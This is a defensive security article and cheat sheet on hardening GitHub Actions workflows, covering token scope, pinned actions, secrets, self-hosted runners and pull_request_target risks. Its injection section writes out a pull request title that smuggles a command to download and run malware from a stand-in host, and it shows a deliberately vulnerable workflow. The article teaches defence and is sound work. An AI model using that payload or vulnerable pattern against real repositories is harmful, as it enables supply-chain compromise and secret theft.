This article is the result of a collaboration with C.J. May.
“GitHub Actions keep me up at night. I worry that a malicious actor will use GitHub Actions to inject code into one of my repositories unbeknownst to me.”
GitHub Actions is an increasingly popular CI/CD platform. They allow to automate almost all the tasks of the development cycle while remaining easy to access. However, since they often use external code, they require some security measures to be applied. We have tried to gather the main tips to secure your GitHub Actions in this cheat sheet:
What are GitHub Actions?
GitHub Actions is GitHub’s CI/Cd service. It’s the mechanism used to run workflows from development to production systems. Actions are triggered by GitHub events (a pull request is submitted, an issue opened, a PR is merged, etc…) and can execute pretty much any command. For instance, they can be used to format the code, format the PR, sync an issue comments with another ticketing system’s comments, add the appropriate labels to a new issue, or trigger a full-scale cloud deployment.
A workflow is made of one or more jobs, which are run inside their own virtual machine or container (a runner), that execute one or more steps. A step can be a shell script or an action, which is a reusable piece of code specially packaged for the GitHub CI ecosystem.
Because GitHub is hosting millions of open-source projects that can be forked and contributed to through pull requests, GitHub Actions security is paramount to prevent supply-chain attacks.
This cheat sheet is here to help you mind the risks posed by some GitHub Action workflows, no matter if you are maintaining open-source projects or not.
Let’s dive into the best practices:
Set minimum scope for credentials
This is a general security principle for all the credentials used by your workflow, but let’s focus on a GitHub-specific one: the GITHUB_TOKEN.
This token is granting each runner privileges to interact with the repository. It is temporary, meaning its validity start and ends with the workflow.
By default, the token’s permissions are either “permissive” (read/write for most of the scopes) or “restricted” (no permission by default in most scopes). In either case, forked repos only have, at most, a read-access. Whether you choose one option or the other, the GITHUB_TOKEN should always be granted the minimum required permissions to execute a workflow/job.
You should make use of the ‘permission’ key in your workflows to configure the minimum required permissions for a workflow or job. This will allow fine-grained control over the privileges of your GitHub Actions. The set of permissions required to call each endpoint of the GitHub API is extensively documented, and you should verify what the default permissions are to match and adjust them.
💡 This principle applies to environment variables as well. To limit the scope of environment variables, you should always declare them at the step level, so they won’t be accessible to other stages. In contrast, defining them at the job level will make them available to all stages, including potentially compromised code (more on that later).
Use specific action version tags
Typically, when people make their own workflows on GitHub, they use Actions made by someone else. Almost all workflows begin with a step like the one below:
- name: Check out repository
uses: actions/checkout@v3
Most people probably think:
“Well yeah, that just fetches my code. What could possibly be dangerous about that?”
The important part to consider is how it checks out your code. That line that starts with “uses” means that there’s some work going on behind the scenes to get the code from your GitHub repo to the server that is running your workflow. For the “actions/checkout” action, that behind-the-scenes stuff lives in its own repo. If you read the source code, there’s actually a lot going on that you wouldn’t have known about if you didn’t take a look! More than that though, you don’t maintain the code that is running in that Action.
When you think about it, there is some risk in blindly trusting all these actions. Third-party actions are interacting with your code and possibly running on a server you own, but do you ever look at what they are actually doing under the hood? Are you monitoring changes that are made to the action when the author publishes an update? For just about everyone, the answer to both of those questions is probably no.
💡 Consider this threat scenario: you are using a third-party action that runs a linter on your code to check for formatting issues. Rather than install, configure, and run a linter yourself, you decide to use an action from the GitHub Actions Marketplace that does what you need. You give it a test run, and it works! Since it does what you want, you set up a workflow in your repo that uses it:
- name: Lint code_
uses: someperson/lint-action@v1
After months of using this action, you suddenly start having issues with your API keys stolen and abused. After some investigating, you find out that the author of the third party linter action recently pushed an update to the GitHub Marketplace. You go to the source repo for the action and see that code was recently added to the linter action to send environment variables to some random web address.
In that hypothetical scenario, the author of the third party action (or someone who hijacked their account) added malicious code to the action and re-tagged it as “v1”. Everyone using someperson/linter-action@v1
was now running the malicious code in their workflows. Now that we see the threat from this scenario, how do we protect ourselves from it?
No one has the time to watch for updates on every third-party action they use, but luckily GitHub gives us a way to prevent updates from altering the actions we use. Rather than running an action with a tag from the repo, you can use a commit hash. For example, when I automatically push container images to Docker Hub, I use the following step in my workflows to authenticate:
- name: Log in to the container registry
uses: docker/login-action@f054a8b539a109f9f41c372932f1ae047eff08c9
By specifying exactly what commit I want to use when I authenticate to Docker Hub, I never have to worry about the action changing or behaving differently. You can do the same thing with any action that you use in your workflows.
Don’t use plain-text secrets
This one is a little more obvious, but it still needs to be said. Source code isn’t the only place where it’s a bad idea to store API keys and passwords in plain text. In fact, it’s probably better stated that there is no place where it’s okay to do that, and CI workflow files are no exception. GitHub Secrets is a feature that allows you to store your keys in a safe way and reference them in your workflows with ${{}}
brackets. Make sure to keep all plain text secrets out of your GitHub Actions.
Of course, you should also leverage your workflow to scan for secrets in the source code itself: here is the ggshield-action you can use for free.
Don’t reference values that you don’t control
GitHub allows you to use ${{}}
brackets to reference secrets and other values from your GitHub environment. Unfortunately, some of the values that you can reference may not be set by you. This is an extremely common mistake found on a number of open-source repositories!
Let’s take a look at this workflow I found and fixed on an open-source repository :
- name: lint
run: |
echo “`${{github.event.pull_request.title}}`” | commitlint
If you look at the “lint” step of the workflow, you can see that the run command includes some input from the pull request. In particular, it’s grabbing the title of the pull request, which is set by the person who submitted it. Let’s say someone submitted a pull request to this repository with a name like:
a" && wget https://example.com/malware && ./malware && echo "Title`
In that scenario, the workflow YAML would be evaluated like the following:
- name: lint
run: |
echo “a" && wget https://example.com/malware && ./malware && echo "Title” | commitlint
In this example, the threat actor downloaded malware and executed it, but they could have done other things like steal the runner’s GITHUB_TOKEN. Depending on the running context of the workflow, the token could have write permission to the original repo, meaning modifying the repository content including releases becomes possible! Another example is exfiltrating sensitive data from the CI, which would allow harvesting secrets that could be used to move laterally.
Pull request title isn’t the only GitHub environment value that is set by external parties. Pull request body, as well as Issue title and body, are also examples of untrusted values. When you are referencing variables like that in steps of your GitHub Actions, it’s important to make sure you control where they come from.
To stay on the safe side, you have two options:
Use an action instead of an inline script
An action will use the (untrusted) context value as an argument, neutralizing injection attacks
- uses: fakeaction/checktitle@v3
with:
title: $`{{ github.event.pull_request.title }}`
Use an intermediate environment variable
If you somehow need to execute a script, you should set up an intermediate environment variable:
- name: Check PR title
env:
PR_TITLE: $`{{ github.event.pull_request.title }}`
run: |
echo “$PR_TITLE”
Notice that we extra precautions by double-quoting the variable to avoid other types of exploitations.
Only run workflows on trusted code
This next section is especially important if you host your own action runners, but it applies to GitHub’s runners too. You need to be vigilant when it comes to when workflows run. By running a workflow, you are giving it permission to potentially run code, access secrets, and execute in the runner environment.
Controlling when workflows run is critical to the security of your GitHub actions. The questions you should be asking yourself are, “What code is running when I kick off my workflow?” and, “Where did that code come from?” If you maintain an open-source repository, you may get periodic pull requests from people you have never interacted with before. Let’s think about a potential threat scenario.
💡 Let’s say you are a maintainer of an organization on GitHub, and you have a popular open-source project that has automated testing set up. Someone submits a pull request to this repo with a new feature and some test cases for it. However, one of the test cases doesn’t test the code, it installs a bitcoin miner on the runner server. As soon as your CI kicks off all of the test code, your runner is compromised.
In practice, GitHub actually has good default settings to protect us from something like this. First, GitHub doesn’t allow individual accounts to use self-hosted runners on public repositories, but they do allow organizations to do so. If you do maintain an organization, this is a danger you need to be very aware of (more in the next section).
Another protection you have against this type of scenario is a setting that lets you determine when GitHub Actions are run on code from pull requests. By default, pull requests from first-time contributors require approval from a maintainer to start CI tests. As a maintainer, it is your responsibility to make sure that you have read all the code being submitted before approving the workflows. Another potential risk is if someone submitted a small pull request before submitting a second with malicious code. This would automatically run all configured workflows because that person is no longer a first-time contributor. It’s not default, but GitHub does have an option to require approval for all outside collaborators. It’s much safer to use this setting over the default.
Harden your Action runners (and don’t use self-hosted runners for public repositories!)
During the setup of your CI workflows, you specify in each workflow where it’s supposed to run. GitHub offers some different runners you can use, such as Ubuntu, Mac, and Windows. When you use GitHub’s runners, they start off as a clean VM each time. However, you also have the option to configure your own servers as runners to execute your workflows.
TL;DR: play it safe and don’t use self-hosted runners for a public repository. You are basically allowing anybody forking your repo to submit a malicious pull request to try to escape its sandbox, access the network… and you are in charge of securing that! So just play it safe and avoid using a self-hosted runner for a public repo if possible.
Now, for those of you who absolutely need to set up a self-hosted runner (for your private repositories please!), you still need to be extra careful:
- You should be the only one configuring the workflows that run on that server.
- Use a dedicated unprivileged account (ex: “github-runner”) to launch the runner and execute the workflows. This user shouldn’t have admin permissions! You should make sure it doesn’t have permission to modify anything outside of its own workspace, and if you absolutely need “sudo” permission in your workflow, you should only allow it for the specific executable it needs.
- It is a security best practice to set up an ephemeral and isolated workload to execute a job (such as a Kubernetes Pod or a container). This way the virtual machine is destroyed when the workflow is done, and you avoid lots of potential risks.
- Use logging and security monitoring tools. If you have a security team with their own tools, make sure they have visibility into your runner servers. Collecting process logs with an EDR agent or something like Sysmon for Linux is the first step, but ideally, you should also have detection rules that will alert you if something suspicious is going on.
💡 In the SolarWinds supply chain attack, the key point of the compromise was when the threat actor was inside SolarWinds’ build servers. The threat actor used that access to inject malicious code into the Orion platform. Tampering with the build process was the impact of the breach, but there were certainly other detection opportunities from the command-and-control (C2) and persistence techniques that the attacker used. Monitoring for suspicious activity on your runners will help you ensure the integrity of your code.
Be extra careful with the pull_request_target trigger
There is another vulnerability, called pwn requests, when maintaining an open-source repository. It is quite subtle, so I will try to go on step-by-step to explain how a malicious pull request could under specific circumstances exfiltrate your secrets or even tamper with the releases!
TL;DR: if you're using the ‘on: pull_request_target’ event in Github Actions, never check out the pull request's code. DON’T use the following:
on: pull_request_target
…
steps:
- uses: actions/checkout@v3
with:
ref: $`{{ github.event.pull_request.head.sha }}`
Explainer: when someone forks your repo and opens a pull request, there are two repos involved: the repo under your control (the target repo), and the other person's fork repo.
Usually, we use the ‘pull_request’ trigger event to trigger a workflow when someone submits a PR. With it, the triggered workflow runs in the context of the (submitter's) fork repo. Therefore the provided GITHUB_TOKEN will not have write access and the secrets are not accessible either.
While these are sane defaults, in some cases they can be a bit too constrained. At the open-source community’s request, GitHub introduced the ‘pull_request_target’ event. The difference between the two is subtle but has a lot of security implications.
The ‘pull_request_target’ trigger runs in the context of your target repo, meaning the workflow has access to YOUR secrets and write access to YOUR code. This gets dangerous when the workflow is running code you don't control: this is why checking out the fork repo's code is basically opening the workflow to any kind of remote code execution!
Example of a vulnerability
To demonstrate this, let’s inspect a vulnerable GitHub Action:
name: my action
on: pull_request_target
jobs:
pr-check:
name: Check PR
runs-on: ubuntu-latest
steps:
- name: Setup Action
uses: actions/checkout@v3
with:
ref: $`{{github.event.pull_request.head.ref}}`
repository: $`{{github.event.pull_request.head.repo.full_name}}`
- name: Setup Python 3.10
uses: actions/setup-python@v3
with:
python-version: 3.10
- name: Install dependencies
run: pip install -r requirements.txt
- name: some command
run: some_command
env:
SOME_SECRET: $`{{ secrets.SOME_SECRET }}`
We have our two conditions met: the workflow triggers to run on the target repo, and the job’s first step the job checks out the HEAD (last commit) of the pull request’s code. So the code that will be used in the rest of the workflow will be coming from the pull request, which opens many exploitation vectors.
For instance, the seemingly innocuous ‘run: pip install …’ executed to install the dependencies is now a potential vector. How? By modifying the setup.py to execute a “pre-install” script before pip launches. Since shell commands are available from the script, an attacker could easily launch a reverse shell, or fetch a malicious payload designed to basically do whatever he wants with the original repository source code, including modifying and re-tagging a release!
This is a perfect example of a vulnerability that can be leveraged to execute a supply-chain attack: all the users of an open-source project would be affected without knowing.
Remember, this is just one vector though! Probably much easier would be to exfiltrate the SOME_SECRET environment variable by changing the some_command binary.
Small remark: this is true because this step is executed after the malicious step: otherwise, the secret would not have been accessible since in any workflow environment variables are only valid during the stage where they are defined (stage-scoped), except job-level defined environment variables (see rule n°1).
It is also worth noting that not only shell commands are vulnerable in this configuration: even if the workflow relies only on actions, odds are high that a code injection would be still possible. A lot of actions are indeed executing local scripts behind the scenes. Final note, we only described the most obvious compromise vectors here, but the number of ways the PR source code could tamper with the workflow execution is huge.
You now see why it is highly discouraged to use the pull_request_target, and if you do, never blindly checkout untrusted PR code!
Prefer OpenID Connect to access cloud resources
OpenID Connect (OIDC) is a technology allowing you to connect your workflows to cloud resources without needing to copy a long-lived secret into GitHub. Instead, when set up, your workflow requests and uses short-lived access tokens from the cloud provider.
This requires a bit of upfront work to set up, but you will benefit in the long run: no more long-lived credentials living in GitHub, fine-grained access controls from your cloud provider, and better-automated secrets management.
For that, you first need to bootstrap a trust relationship (OIDC Trust) on the cloud provider side, controlling who can access what. Then, on GitHub side, an OIDC Provider will be configured to auto-generate a JWT token containing claims which allow the workflow to authenticate to the cloud provider. Once these claims are validated, a role-scoped, short-lived, access token is sent back to the workflow to execute. Learn how to configure OpenID Connect with GitHub here.
Conclusion
GitHub Actions is among the favorite CI/CD tool of the open-source community. With popularity comes more security scrutiny. Whether you use actions on public or private repositories, you should be careful about how you set up your workflows. Failing to do so could make your secrets and artifacts vulnerable, lead to a compromise of your build servers, or even allow someone to carry out a supply chain attack.
We have presented you with the GitHub Actions security best practices.
Here is a brief summary:
- Use minimally scoped credentials, in particular, make sure the GITHUB_TOKEN is configured with the least privileges to run your jobs.
- Use specific version tags to shield yourself from supply-chain compromise of third-party actions.
- Never store any API key, token, or password in plaintext (use GitHub Secrets). Use the ggshield-action to implement secrets detection with remediation in your CI workflows.
- Don’t reference directly values that you don’t control: it’s all too easy for a malicious PR to inject code. Rather, use an action with arguments, or bind the value to an environment variable.
- Be extra-careful when using self-hosted runners: preferably don’t use this option for open source repositories, or require approval for all external submissions to run workflows. It’s your responsibility to harden the virtual machines used by the runners, so configure them to use a low-privileged user, be as ephemeral as possible, and instrument the adequate logging and monitoring tools.
- Don’t check out external PRs when using the ‘pull_request_target event’: a malicious PR could abuse any of your build steps/secrets to compromise your environment.
- Prefer using OpenID Connect instead of long-lived secrets to allow your workflows to interact with cloud resources.
This can be hard to remember, that’s why we packaged all of this in a cheat sheet. Feel free to share it around you!